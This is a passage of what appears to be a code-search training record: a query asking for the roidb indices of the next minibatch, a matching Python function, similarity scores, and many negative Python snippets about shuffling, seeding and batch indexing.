shuffle_in_unison(self, x_train, y_train,split=0.1):\n n = np.size(x_train,axis=0)\n p = np.random.permutation(len(x_train))\n cutoff = int(split*n)\n p_val = p[0:cutoff]\n p_train = p[cutoff:]\n return x_train[p_train], y_train[p_train], x_train[p_val], y_train[p_val]", "def _reweight(self):\n self._seed_weights = [self._graph.degree(seed) for seed in self._seeds]\n weight_sum = np.sum(self._seed_weights)\n self._seed_weights = [float(weight)/weight_sum for weight in self._seed_weights]", "def shuffle(self):\n self.__c_elem().melange()", "def randomize(self):\r\n # first take care of all parameters (from N(0,1))\r\n x = self._get_params_transformed()\r\n x = np.random.randn(x.size)\r\n self._set_params_transformed(x)\r\n # now draw from prior where possible\r\n x = self._get_params()\r\n if self.priors is not None:\r\n [np.put(x, i, p.rvs(1)) for i, p in enumerate(self.priors) if not p is None]\r\n self._set_params(x)\r\n self._set_params_transformed(self._get_params_transformed()) # makes sure all of the tied parameters get the same init (since there's only one prior object...)\r", "def random_seed(seed):\n state = RandomState()\n random.seed(seed) # alter state\n np.random.seed(seed)\n torch.manual_seed(seed)\n yield\n state.set_global()", "def mutate_nonstructural(self):\n # TODO consider clamping weights and biases?\n for link in self.gene_links:\n # Disable/Enable links\n if event(link_toggle_prob): # Chance of toggling link\n link.enabled = True if link.enabled is False else False\n if link.enabled is False and event(link_enable_prob): # Chance of enabling a disabled link\n link.enabled = True\n # Mutate weights\n if event(weight_mutate_rate):\n if event(weight_replace_rate): # replace with random weight\n link.weight = random.uniform(weight_init_min, weight_init_max)\n else: # adjust weight\n link.weight += random.uniform(-uniform_weight_scale, uniform_weight_scale)\n for node in self.gene_nodes:\n # Mutate bias\n if event(bias_mutate_rate):\n if event(bias_replace_rate): # replace with random bias\n node.bias = random.uniform(bias_init_min, bias_init_max)\n else: # adjust bias\n node.bias += random.uniform(-uniform_weight_scale, uniform_weight_scale)\n # Mutate 
activation func\n if node.can_modify:\n if event(change_act_prob):\n node.act_func = self.act_set.get_random_activation_func()\n # reinit freq amp and vshift when act func changes\n if node.act_func.__name__[0] == \"g\":\n node.freq = random.uniform(-gauss_freq_range, gauss_freq_range)\n node.amp = random.uniform(-func_amp_range, func_amp_range)\n node.vshift = random.uniform(-gauss_vshift_range, gauss_vshift_range)\n elif node.act_func.__name__[0] == \"s\":\n node.freq = random.uniform(-sin_freq_range, sin_freq_range)\n node.amp = random.uniform(-func_amp_range, func_amp_range)\n node.vshift = random.uniform(-sin_vshift_range, sin_vshift_range)\n # Adjust freq amp and vshift of activation function\n if event(func_adjust_prob):\n if node.act_func.__name__[0] == \"g\":\n node.freq += random.uniform(-guass_freq_adjust, guass_freq_adjust)\n elif node.act_func.__name__[0] == \"s\":\n node.freq += random.uniform(-sin_freq_adjust, sin_freq_adjust)\n if event(func_adjust_prob):\n if node.act_func.__name__[0] == \"g\" or node.act_func.__name__[0] == \"s\":\n node.amp += random.uniform(-func_amp_adjust, func_amp_adjust)\n if event(func_adjust_prob):\n if node.act_func.__name__[0] == \"g\" or node.act_func.__name__[0] == \"s\":\n node.vshift += random.uniform(-func_vshift_adjust, func_vshift_adjust)\n # Mutate substrate width/height rectangles\n if event(width_mutate_prob):\n if event(0.5):\n self.substrate_width += 1\n elif self.substrate_width > 1:\n self.substrate_width -= 1\n if event(height_mutate_prob):\n if event(0.5):\n self.substrate_height += 1\n elif self.substrate_height > 1:\n self.substrate_height -= 1\n \"\"\" ES-HyperNeat - no longer used\n # Mutate QuadTree variance\n if event(var_mutate_prob):\n self.var_thresh += np.random.normal(scale=gauss_var_scale)\n self.var_thresh = self.var_thresh if self.var_thresh > 0 else 0\n # Mutate QuadTree band thresh\n if event(band_mutate_prob):\n self.band_thresh += np.random.normal(scale=gauss_band_scale)\n self.band_thresh = self.band_thresh if self.band_thresh > 0 else 0\n \"\"\"", "def _choose_sample(self):\n\n \t #periodically generate a new reconstruction for the purposes of sampling", "def random_permutation_sampling_sequential(model, length, context, num_samples=1, temperature=0.5, repetition_penalty=1.0,\n top_k=0, top_p=0.0, is_xlnet=False, device='cpu'):\n\n context = torch.tensor(context, dtype=torch.long, device=device)\n context = context.unsqueeze(0).repeat(num_samples, 1)\n generated = context #maybe add a for loop later\n input_ids = torch.cat((generated, torch.zeros((1, length), dtype=torch.long, device=device)), dim=1)\n\n with torch.no_grad():\n random_permutation = np.arange(input_ids.shape[1])[-length:]\n np.random.shuffle(random_permutation)\n perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float, device=device)\n perm_mask[:, :, -length:] = 1.0\n for idx, perm_idx in enumerate(random_permutation):\n perm_mask[:,:, random_permutation[:idx]] = 0.\n\n target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float, device=device)\n target_mapping[0,0, perm_idx] = 1.0\n inputs = {'input_ids': input_ids, 'perm_mask': perm_mask, 'target_mapping': target_mapping}\n outputs = model(**inputs)\n next_token_logits = outputs[0][0,:,:] / (temperature if temperature > 0 else 1.)\n for _ in set(generated.view(-1).tolist()):\n next_token_logits[:,_] /= repetition_penalty\n filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=top_k, top_p=top_p)\n if temperature == 0: #greedy 
sampling:\n next_token = torch.argmax(filtered_logits).unsqueeze(0)\n else:\n next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1)\n\n input_ids[:, perm_idx] = next_token[:, 0]\n\n return input_ids, random_permutation", "def _shuffle(self, reinit_indexes = False):\n print('Shuffling data...')\n # set seed for reproducibility\n #random.seed()\n # shuffle identities\n random.shuffle(self.identities)\n # shuffle images associated to each identity\n for identity in self.groundtruth_metadata.keys():\n random.shuffle(self.groundtruth_metadata[identity]['metadata'])\n if reinit_indexes:\n self.groundtruth_metadata[identity]['index'] = 0\n print('Finished shuffling data!')", "def posterior_sampler(self, nsamples, seed=0, verbose=True):\n\n import random\n\n random.seed(seed)\n sample = self.get_chain()[-self.get_tune:]\n sample = sample.reshape(-1, sample.shape[-1])\n sample = random.choices(sample, k=nsamples)\n\n return sample", "def random_permutation(iterable, r=None):\n pool = tuple(iterable)\n if r is None:\n r = len(pool)\n return list(random.sample(pool, r))", "def seed_random():\n random.seed(0)", "def _sample_seed(self):\n raise Exception(\" not implemented in base model\")", "def mutate(self, chance, amount):\r\n for layer in self.layers:\r\n for row in range(layer.output_size):\r\n for col in range(layer.input_size+1):\r\n if np.random.rand() < chance:\r\n new_val = layer.weights[row, col] + np.random.uniform(-amount, amount)\r\n new_val = min(max(-1, new_val), 1)\r\n layer.weights[row, col] = new_val", "def seed():", "def shuffle(self, return_perm=False):\n perm = torch.randperm(len(self))\n dataset = self.index_select(perm)\n return (dataset, perm) if return_perm is True else dataset" ]
[ "0.7341957", "0.6980299", "0.6517204", "0.6517204", "0.64934677", "0.64483047", "0.6303886", "0.6292093", "0.6292093", "0.626896", "0.61837375", "0.61757475", "0.6172573", "0.6138042", "0.61206377", "0.6080488", "0.6078871", "0.6064974", "0.59135115", "0.59126294", "0.5903226", "0.5892479", "0.5876207", "0.58738816", "0.58374935", "0.5809452", "0.5807619", "0.5781552", "0.5739598", "0.5731684", "0.571783", "0.57064295", "0.5702457", "0.56808406", "0.567266", "0.5656318", "0.5631844", "0.56245595", "0.5620422", "0.56138355", "0.56106174", "0.5607577", "0.5606569", "0.5602816", "0.5595942", "0.55915755", "0.55787855", "0.5567519", "0.5556755", "0.55527246", "0.5549788", "0.5540681", "0.55388415", "0.5538694", "0.5522875", "0.55211127", "0.55171037", "0.5514125", "0.5510058", "0.54922324", "0.54895866", "0.5488043", "0.5487523", "0.5485808", "0.5483452", "0.5482916", "0.5479271", "0.5475669", "0.5471346", "0.54682356", "0.546802", "0.5452954", "0.54516566", "0.5446327", "0.5446327", "0.54457927", "0.5444331", "0.5440252", "0.54400563", "0.5430805", "0.54298764", "0.54289883", "0.54283684", "0.5422727", "0.54204017", "0.54179686", "0.5416453", "0.5410083", "0.5407443", "0.5404178", "0.5399556", "0.53966933", "0.5390906", "0.53884965", "0.5384516", "0.53758454", "0.5368644", "0.536554", "0.53653383", "0.5364254" ]
0.65922296
2
Return the roidb indices for the next minibatch.
def _get_next_minibatch_idx(self): if self.cur + self.batch_size >= self.num_images: self._shuffle_roidb_idx() db_idx = self.perm[self.cur:self.cur + self.batch_size] self.cur += self.batch_size return db_idx
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_next_minibatch_inds(self):\n ## 实际上只需要向后遍历一个即可\n\n if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):\n self._shuffle_roidb_inds()\n self._cur = 0\n\n db_inds = self._perm[self._cur : self._cur+ cfg.TRAIN.IMS_PER_BATCH]\n self._cur += cfg.TRAIN.IMS_PER_BATCH\n return db_inds", "def _get_next_minibatch_inds(self):\r\n \r\n \r\n # We use a deque and always take the *first* IMS_PER_BATCH items\r\n # followed by *rotating* the deque so that we see fresh items\r\n # each time. If the length of _perm is not divisible by\r\n # IMS_PER_BATCH, then we end up wrapping around the permutation.\r\n db_inds = [self._perm[i] for i in range(IMS_PER_BATCH)]\r\n self._perm.rotate(-IMS_PER_BATCH)\r\n self._cur += IMS_PER_BATCH\r\n if self._cur >= len(self._perm):\r\n self._shuffle_roidb_inds()\r\n return db_inds", "def _get_next_minibatch_inds(self,isTrain=True):\n if isTrain:\n if cfg.TRAIN.HAS_RPN:\n if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):\n self._shuffle_roidb_inds()\n\n db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]\n self._cur += cfg.TRAIN.IMS_PER_BATCH\n else:\n # sample images\n db_inds = np.zeros((cfg.TRAIN.IMS_PER_BATCH), dtype=np.int32)\n i = 0\n while (i < cfg.TRAIN.IMS_PER_BATCH):\n ind = self._perm[self._cur]\n num_objs = self._roidb[ind]['boxes'].shape[0]\n if num_objs != 0:\n db_inds[i] = ind\n i += 1\n\n self._cur += 1\n if self._cur >= len(self._roidb):\n self._shuffle_roidb_inds()\n else:\n if self._cur + cfg.TRAIN.IMS_PER_BATCH < len(self._roidb):\n db_inds = range(len(self._roidb))[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]\n self._cur += cfg.TRAIN.IMS_PER_BATCH\n else:\n print 'Done evaluating all testing data, now check the last shown accumulated confusion matrix as the final result.'\n sys.exit()\n\n return db_inds", "def _get_next_minibatch_inds(self):\n img_next = self._cursor[0].next()\n msk_next = self._cursor[1].next()\n if img_next and msk_next:\n pass\n else:\n print 'BlobFetcher to begin because of cursor point to end.'\n self._cursor = [self._txn[0].cursor(), self._txn[1].cursor()]\n self._cursor[0].next()\n self._cursor[1].next()", "def get_next_minibatch(self):\r\n valid = False\r\n while not valid:\r\n db_inds = self._get_next_minibatch_inds()\r\n minibatch_db = [self._roidb[i] for i in db_inds]\r\n blobs, valid = minibatch.get_minibatch(minibatch_db)\r\n return blobs", "def _get_next_minibatch(self,isTrain=True):\n db_inds = self._get_next_minibatch_inds(isTrain=isTrain)\n minibatch_db = [self._roidb[i] for i in db_inds]\n return get_minibatch(minibatch_db, self._num_classes)", "def run_idxs(self):\n return list(range(len(self._h5[RUNS])))", "def _next_index(self):\n # Cache a string of random numbers to speed things up\n if not self.rnd_pool_:\n self.rnd_pool_ = self.rnd.randint(0, self.input_size - 1, self.batch_size * 10).tolist()\n\n return self.rnd_pool_.pop()", "def getBreakIndices(self):\n for i in self.raw.index[:-1]:\n if self.raw['stress'][i+1] > self.raw['stress'][i] and \\\n self.raw['stress'][i+2] < self.raw['stress'][i+1]:\n brkIdx1 = i+1 # brkIdx1: start of the first unloading\n break\n if self.reloading:\n for i in self.raw.index[brkIdx1+1:-1]:\n if self.raw['stress'][i+1] < self.raw['stress'][i] and \\\n self.raw['stress'][i+2] > self.raw['stress'][i+1]:\n brkIdx2 = i+1 # brkIdx2: end of the first unloading\n break\n # brkIdx3: Point on the NCL after the first reloading\n brkIdx3 = self.raw.query(f'stress == stress[{brkIdx1}]').index[1]\n # brkIdx4: index of the last point on the NCL\n 
brkIdx4 = self.raw.query('stress == stress.max()').index[0]\n self.secondUnloading = False\n else:\n brkIdx2 = self.raw.index[-1]\n brkIdx3 = None\n brkIdx4 = None\n\n self.brkIdx1 = brkIdx1\n self.brkIdx2 = brkIdx2\n self.brkIdx3 = brkIdx3\n self.brkIdx4 = brkIdx4\n return", "def get_minibatch(self):\n if self.count < self.agent_history_length:\n raise ValueError('Not enough memories to get a minibatch')\n \n self._get_valid_indices()\n \n for i, idx in enumerate(self.indices):\n self.states[i] = self._get_state(idx - 1)\n self.new_states[i] = self._get_state(idx)\n \n return np.transpose(self.states, axes=(0, 2, 3, 1)), self.actions[self.indices], self.rewards[self.indices], np.transpose(self.new_states, axes=(0, 2, 3, 1)), self.terminal_flags[self.indices]", "def _get_next_minibatch(self):\n images = np.zeros((self._batch_size, 3, self._crop_h, self._crop_w), dtype=np.float32)\n masks = np.zeros((self._batch_size, 1, self._crop_h, self._crop_w), dtype=np.float32)\n\n shuffled_batch = np.arange(self._batch_size)\n np.random.shuffle(shuffled_batch)\n for batch_index in shuffled_batch:\n blob_queue = self._blob_queue.get()\n images[batch_index, :, :, :] = blob_queue[0]\n masks[batch_index, :, :, :] = blob_queue[1]\n\n return [images, masks]", "def indices(self):\n return self._kbounded_partitions", "def next_run_idx(self):\n return self.num_runs", "def _get_batches_starting_indexes(self):\n\n indexes = numpy.arange(0, self.num_frames, self.recurrence)\n indexes = numpy.random.permutation(indexes)\n\n # Shift starting indexes by self.recurrence//2 half the time\n if self.batch_num % 2 == 1:\n indexes = indexes[(indexes + self.recurrence) % self.num_frames_per_proc != 0]\n indexes += self.recurrence // 2\n self.batch_num += 1\n\n num_indexes = self.batch_size // self.recurrence\n batches_starting_indexes = [indexes[i:i+num_indexes] for i in range(0, len(indexes), num_indexes)]\n\n return batches_starting_indexes", "def master_ndindex(self): # itermaster_indices(self):\n return itertools_product(\n *[range(*r) for r in self.location]\n ) # TODO check", "def get_minibatch(roidb):\n # We collect blobs from each image onto a list and then concat them into a\n # single tensor, hence we initialize each blob to an empty list\n blobs = {k: [] for k in get_minibatch_blob_names()}\n\n # Get the input image blob\n im_blob, im_scales = _get_image_blob(roidb)\n blobs['data'] = im_blob\n\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster/Mask R-CNN\n valid = roi_data.rpn.add_rpn_blobs(blobs, im_scales, roidb)\n elif cfg.RETINANET.RETINANET_ON:\n raise NotImplementedError\n else:\n # Fast R-CNN like models trained on precomputed proposals\n valid = roi_data.fast_rcnn.add_fast_rcnn_blobs(blobs, im_scales, roidb)\n return blobs, valid", "def _next_minibatch(self):\n batch = self.data[self.ix:self.ix+self.batch_size]\n if len(batch) < self.batch_size:\n random.shuffle(self.data)\n self.ix = self.batch_size - len(batch)\n batch += self.data[:self.ix]\n else:\n self.ix += self.batch_size\n self.batch = batch", "def get_raster_ids(self):\n return numpy.array(range(self._lo_atom, self._lo_atom + self._n_atoms))", "def get_minibatches_idx(n, minibatch_size, shuffle=False):\n\n idx_list = numpy.arange(n, dtype=\"int32\")\n\n if shuffle:\n numpy.random.shuffle(idx_list)\n\n minibatches = []\n minibatch_start = 0\n for i in range(n // minibatch_size):\n minibatches.append(idx_list[minibatch_start:\n minibatch_start + minibatch_size])\n minibatch_start += minibatch_size\n\n if (minibatch_start != n):\n # Make a 
minibatch out of what is left\n minibatches.append(idx_list[minibatch_start:])\n\n return zip(range(len(minibatches)), minibatches)", "def get_minibatches_idx(n, minibatch_size, shuffle=False):\n\n idx_list = np.arange(n, dtype=\"int32\")\n\n if shuffle:\n random.shuffle(idx_list)\n\n minibatches = []\n minibatch_start = 0\n for i in range(n // minibatch_size):\n minibatches.append(idx_list[minibatch_start:\n minibatch_start + minibatch_size])\n minibatch_start += minibatch_size\n\n if (minibatch_start != n):\n # Make a minibatch out of what is left\n minibatches.append(idx_list[minibatch_start:])\n\n return zip(range(len(minibatches)), minibatches)", "def batch_indices(self):\n b = self.batch_size\n return [np.arange(i*b, i*b+b) for i in range(self.num_batches)]", "def getBatch(self, n, rng, dataset):\n pmax = self._root.priority\n step = pmax / n\n indices = np.zeros(n, dtype='int32')\n for i in range(n):\n p = rng.uniform(i*step, (i+1)*step)\n node = self.find(p)\n index = self._checkTerminal(node.position, dataset)\n if (index >= 0):\n indices[i] = index\n else:\n return np.zeros(0)\n\n return indices", "def get_pulling_indices(self, weight):\n pass", "def get_minibatches_idx(n, minibatch_size, shuffle=False):\n\n idx_list = range(n)\n\n if shuffle:\n random.shuffle(idx_list)\n\n minibatches = []\n minibatch_start = 0\n for i in range(n // minibatch_size):\n minibatches.append(idx_list[minibatch_start:\n minibatch_start + minibatch_size])\n minibatch_start += minibatch_size\n\n if (minibatch_start != n):\n # Make a minibatch out of what is left\n minibatches.append(idx_list[minibatch_start:])\n\n return zip(range(len(minibatches)), minibatches)", "def get_indexes(self, dataset):\n\n for i in range(self.max_iters):\n index = random.randint(0, len(dataset))\n gt_bboxes_i = dataset.get_ann_info(index)['bboxes']\n if len(gt_bboxes_i) != 0:\n break\n\n return index", "def _raveled_index(self):\n return np.r_[:self.size]", "def _raveled_index(self):\n return np.r_[:self.size]", "def starting_values(self, resids: NDArray) -> NDArray:", "def get_refresh_ids(self):\n ids = []\n for bucket in self.router.lonely_buckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids", "def ring_idx(self) -> int:\n return self._ring_idx", "def job_ids(self):\n return self.connection.lrange(self.key, 0, -1)", "def getRefreshIDs(self):\n ids = []\n for bucket in self.router.getLonelyBuckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids", "def indices(self):\n return range(len(self))", "def get_next_bin_nodes(self, n):\n # Implemented from template for osid.resource.ResourceList.get_next_resources\n return self._get_next_n(n)", "def minibatch(self, size):\n indexes = self.sample(size)\n\n pre_states = np.array([self.get_state(index) for index in indexes], dtype=np.float32)\n post_states = np.array([self.get_state(index + 1) for index in indexes], dtype=np.float32)\n actions = self._actions[indexes]\n rewards = self._rewards[indexes]\n dones = self._terminals[indexes]\n\n return pre_states, actions, post_states, rewards, dones", "def get_training_index():\n return list(range(0, 305))", "def get_shuffle_ids(self, bsz):\n forward_inds = torch.randperm(bsz).long().cuda()\n backward_inds = torch.zeros(bsz).long().cuda()\n value = torch.arange(bsz).long().cuda()\n backward_inds.index_copy_(0, forward_inds, value)\n return forward_inds, backward_inds", "def get_rep_mol_indexes():\n f = open(FILE_WITH_REP_MOL_IDXS, 
\"r\")\n rd = csv.reader(f)\n mols = rd.next()\n f.close()\n mol_idxs = [int(i) - 1 for i in mols]\n os.unlink(FILE_WITH_REP_MOL_IDXS)\n return mol_idxs", "def create_minibatch(self):\r\n if self.experience_batch.shape[0] <= self.minibatch_size:\r\n self.minibatch = self.experience_batch\r\n\r\n else:\r\n ind = np.random.randint(self.experience_batch.shape[0], size=self.minibatch_size) # same sample can be in the minibatch multiple times --> problem for algorithm ?\r\n self.minibatch = self.experience_batch[ind]", "def _repl_iterator(self, nodename):\n\n return (self._hash(\"%s:%s\" % (nodename, i))\n for i in xrange(self.replicas))", "def _repl_iterator(self, nodename):\n\n return (self._hash(\"%s:%s\" % (nodename, i))\n for i in xrange(self.replicas))", "def _get_split_indices(self):\n\n cumsum = np.cumsum(\n np.concatenate((np.array([0], dtype=np.int8), self.split_sizes)))\n \n fold_inds = np.array(\n [(cumsum[n], cumsum[n + 1]) for n in range(self.n_splits)])\n\n return fold_inds", "def next_batch(self):\n assert self.has_next_batch()\n start, end = self.current_index, self.current_index + self.batch_size\n current_indices = self.indices[start:end]\n img_files = self.img_files[current_indices]\n if self.is_train: \n anchor_files = self.anchor_files[current_indices]\n self.current_index += self.batch_size\n return img_files, anchor_files\n else:\n self.current_index += self.batch_size\n return img_files", "def get_active_register_indices(self):\n assert self.sketch.ndim == 1, 'Currently only support 1-dimensional sketch.'\n return np.flatnonzero(self.sketch)", "def forward(self):\n blobs = self._get_next_minibatch()\n return blobs", "def train_batch_idx(self) -> int:\n return self._train_batch_idx", "def get_next_batch_start(self):\n return None", "def _get_replay_buffer_filled_indices(self, replay_buffers, actor_index):\n # We know that the reservoir value > 0 if it's been filled, so check for entries where it == 0\n buffer_indicator = replay_buffers['reservoir_val'][actor_index].squeeze(1)\n replay_indices = np.where(buffer_indicator != 0)[0]\n return replay_indices", "def index(self):\n return self._epochs_completed * self._size + self._index_in_epoch", "def get_next_bin(self):\n # Implemented from template for osid.resource.ResourceList.get_next_resource\n return self.next()", "def __get_random_indices(self):\n rand_row = random.randint(0, self.__row_count - 1)\n rand_col = random.randint(0, self.__col_count - 1)\n return [rand_row, rand_col]", "def getStarts(self) -> List[int]:\n ...", "def get_active_ranks(self,fine=False):\n \n if fine:\n nqpt = self.nqpt_fine\n else:\n nqpt = self.nqpt\n \n #max_nqpt_per_worker = (self.nqpt // size\n # + min(self.nqpt % size, 1))\n #n_active_workers = (self.nqpt // max_nqpt_per_worker\n # + min(self.nqpt % max_nqpt_per_worker, 1))\n max_nqpt_per_worker = (nqpt // size\n + min(nqpt % size, 1))\n n_active_workers = (nqpt // max_nqpt_per_worker\n + min(nqpt % max_nqpt_per_worker, 1))\n return np.arange(n_active_workers)", "def get_slots(self) -> int:", "def _compute_relative_leaderboard_indexes(ranking, size):\n if ranking == 0 or ranking == 1:\n return (0, 5)\n elif ranking == size or ranking == size-1:\n return (max(0, size-5), size)\n else:\n return (max(0, ranking-2), max(size, ranking+3))", "def __next__(self):\n if self.cur_batch_id >= self.n_batches:\n self.cur_batch_id = 0\n raise StopIteration\n else:\n start = int(np.sum(self.batch_size_B[:self.cur_batch_id]))\n stop = start + int(self.batch_size_B[self.cur_batch_id])\n cur_batch_tuple = 
(\n self.u[start:stop],\n self.v[start:stop],\n self.rating[start:stop])\n self.cur_batch_id += 1\n return cur_batch_tuple", "def sample_idxs(self, batch_B, batch_T):\n t, b, f = self.t, self.off_backward + batch_T, self.off_forward\n high = self.T - b - f if self._buffer_full else t - b - f\n T_idxs = np.random.randint(low=0, high=high, size=(batch_B,))\n T_idxs[T_idxs >= t - b] += min(t, b) + f\n if self.rnn_state_interval > 0: # Some rnn states stored; only sample those.\n T_idxs = (T_idxs // self.rnn_state_interval) * \\\n self.rnn_state_interval\n B_idxs = np.random.randint(low=0, high=self.B, size=(batch_B,))\n return T_idxs, B_idxs", "def indices(self):\n _indices = []\n for h in self.miller.indices():\n _indices.append(self.indices_hkl(*h)[0])\n return _indices", "def spit(self):\n idxs = np.arange(self.total_tuples)\n return [self.recurse_index_state(copy.deepcopy(self.state_buffer), idxs), self.recurse_index_state(copy.deepcopy(self.state2_buffer), idxs), self.action_buffer[idxs], self.adv_buffer[idxs], \n self.rtg_buffer[idxs], self.logp_buffer[idxs], self.valid_actions_buffer[idxs], self.rew_buffer[idxs], self.done_buffer[idxs]]", "def test_batch_idx(self) -> int:\n return self._test_batch_idx", "def get_next_bin_node(self):\n # Implemented from template for osid.resource.ResourceList.get_next_resource\n return self.next()", "def next_index(state):\n node = state\n for key in (\"layers\", \"index\"):\n node = node.get(key, {})\n indices = [key for key in node.keys()]\n if len(indices) == 0:\n return 0\n else:\n return max(indices) + 1", "def get_main_points(neuron):\n (branch_index,) = np.where(neuron.branch_order[neuron.n_soma:] == 2)\n (endpoint_index,) = np.where(neuron.branch_order[neuron.n_soma:] == 0)\n selected_index = np.union1d(branch_index + neuron.n_soma,\n endpoint_index + neuron.n_soma)\n selected_index = np.append(range(neuron.n_soma), selected_index)\n return selected_index", "def next_position(self) -> List[int]:\n return self.__path_to_end()[1]", "def get_final_pruned_indices(self):\n return self.final_pruned_indices", "def get_main_branch_indices(self):\n\n assert self.halt is not None\n prog_main_index = self.halt_index\n prog_main_indices = self.halt.prop(\n 'progenitor.main.indices', self.halt_index)\n self.main_branch_indices = prog_main_indices\n return prog_main_indices", "def get_minibatch(self, prioritized=True):\n if prioritized:\n sampling_priorities = np.abs(self.mem_error) + 1e-9\n else:\n sampling_priorities = np.ones(shape=self.mem_error.shape)\n sampling_probs = sampling_priorities / np.sum(sampling_priorities)\n sample_indices = [x for x in range(self.mem_state.shape[0])]\n choice_indices = np.random.choice(sample_indices,\n min(self.mem_state.shape[0],\n self.batch_size),\n p=np.squeeze(sampling_probs),\n replace=False\n )\n states = self.mem_state[choice_indices]\n rewards = self.mem_reward[choice_indices]\n sucstates = self.mem_sucstate[choice_indices]\n episode_active = self.mem_episode_active[choice_indices]\n\n return choice_indices, states, rewards, sucstates, episode_active", "def get_batch(self):\n self._next_minibatch()\n scans = np.empty((self.batch_size, 2, RANGE_BINS, HEADING_BINS), dtype=np.float32)\n targets = np.empty((self.batch_size, 1, RANGE_BINS, HEADING_BINS), dtype=np.float32)\n features = np.empty((self.batch_size, 2048, 3, 12), dtype=np.float32)\n\n long_ids = []\n assert len(self.batch) == self.batch_size\n for n,item in enumerate(self.batch):\n long_ids.append(item['scan'] + \"_\" + item['image_id'])\n # Select one 
feature if there are multiple versions\n selected_features = random.choice(item['features'])\n\n if self.augment:\n # random rotation by a 30 degree increment\n rotation = random.randint(0,12)\n ix = int(len(item['laser'])/12*rotation)\n laser = np.roll(item['laser'], ix) # end rolls around to start\n tgt_heading = np.array([normalize_angle(h + (math.pi/6)*rotation) for h in item['target_heading']])\n feat = np.roll(selected_features, rotation, axis=1)\n else:\n laser = np.array(item['laser'], copy=True)\n tgt_heading = item['target_heading']\n feat = selected_features\n\n # missing part of scan\n length = len(laser)\n miss_start = random.randint(0, length)\n miss_end = miss_start + int((360-self.laser_fov_deg)/360 * length)\n laser[miss_start:miss_end] = -1\n if miss_end >= length:\n laser[:miss_end-length] = -1\n\n # dropout. Unlike conventional dropout, this occurs at both train and test time and is \n # considered to represent missing return values in the laser scan.\n drop = np.random.random_sample((len(laser),))\n laser[drop < self.dropout] = -1 # Indicates missing return.\n\n scans[n, 1, :, :] = radial_occupancy(laser).transpose((2,0,1))\n # add a range indicating channel\n r = np.linspace(-0.5, 0.5, num=RANGE_BINS)\n scans[:,0,:,:] = np.expand_dims(np.expand_dims(r, axis=0), axis=2)\n targets[n, :, :, :] = radial_target(tgt_heading, item['target_range']).transpose((2,0,1))\n features[n, :, :, :] = feat.transpose((2,0,1))\n # features = np.zeros_like(features) # How does it work without image features?\n # scans = np.zeros_like(scans) # How does it work with only image features?\n # Normalize targets into a probability dist\n targets /= targets.reshape(targets.shape[0], -1).sum(axis=1).reshape(-1, 1, 1, 1)\n return scans, features, targets, long_ids", "def get_indexes(self, dataset: BaseDataset) -> int:\n\n index = [np.random.randint(0, len(dataset)) for _ in range(1)]\n\n return index", "def get_resource_index(self):\n result = -1\n max_sleep_time = self.time_window\n with self._lock:\n while result == -1:\n for i in range(0, self.num_keys):\n curr_sleep_time = max((self.timers[i][0] + self.time_window) - time.time(), 0)\n\n max_sleep_time = min(max_sleep_time, curr_sleep_time)\n\n if self.timers[i][1] >= self.window_limit and self.timers[i][0] + self.time_window < time.time():\n self.timers[i][0] = 0\n self.timers[i][1] = 0\n\n if self.timers[i][1] < self.window_limit:\n result = i\n break\n\n if result == -1: # case when all streams are rate limited\n # logging.warning('sleeping for %d seconds.' 
% max_sleep_time)\n # time.sleep(max_sleep_time)\n return -1 * max_sleep_time\n\n if self.timers[result][0] == 0:\n self.timers[result][0] = time.time()\n\n self.timers[result][1] += 1\n\n return result", "def getBinIndices(self, linear_index):\n return linear_index / self.magic_array % self.nbins_across_dims", "def _get_index(self):\n\n return self.index\n\n # to avoid having differences bigger than 2pi", "def _shuffle_roidb_inds(self):\r\n if True: #cfg.TRAIN.ASPECT_GROUPING:\r\n widths = np.array([r['width'] for r in self._roidb])\r\n heights = np.array([r['height'] for r in self._roidb])\r\n horz = (widths >= heights)\r\n vert = np.logical_not(horz)\r\n horz_inds = np.where(horz)[0]\r\n vert_inds = np.where(vert)[0]\r\n\r\n horz_inds = np.random.permutation(horz_inds)\r\n vert_inds = np.random.permutation(vert_inds)\r\n mb = 2 #cfg.TRAIN.IMS_PER_BATCH\r\n horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]\r\n vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]\r\n inds = np.hstack((horz_inds, vert_inds))\r\n\r\n inds = np.reshape(inds, (-1, mb))\r\n row_perm = np.random.permutation(np.arange(inds.shape[0]))\r\n inds = np.reshape(inds[row_perm, :], (-1, ))\r\n self._perm = inds\r\n else:\r\n self._perm = np.random.permutation(np.arange(len(self._roidb)))\r\n self._perm = deque(self._perm)\r\n self._cur = 0", "def compute_batch_indices(batch_size: int, beam_size: int) ->torch.LongTensor:\n batch_pos = torch.arange(batch_size)\n batch_pos = batch_pos.view(-1, 1).expand(batch_size, beam_size)\n return batch_pos", "def next(self) -> int:\n self.index += 1\n return self.nodes_sorted[self.index]", "def get_batch_idx(self, split):\r\n start = self.idx_in_epoch[split]\r\n\r\n # Is epoch finished?\r\n if self.idx_in_epoch[split] == self.nsamples[split]:\r\n start = 0\r\n self.idx_in_epoch[split] = 0\r\n\r\n # shuffle training set at start of epoch\r\n if start == 0 and split == 'train':\r\n self.shuffle_train()\r\n\r\n # Set end of batch\r\n self.idx_in_epoch[split] += self.batch_size\r\n if self.idx_in_epoch[split] > self.nsamples[split]:\r\n self.idx_in_epoch[split] = self.nsamples[split]\r\n end = self.idx_in_epoch[split]\r\n\r\n return self.idx[split][start:end]", "def indices(self):\n\n # We used lookup tables here. 
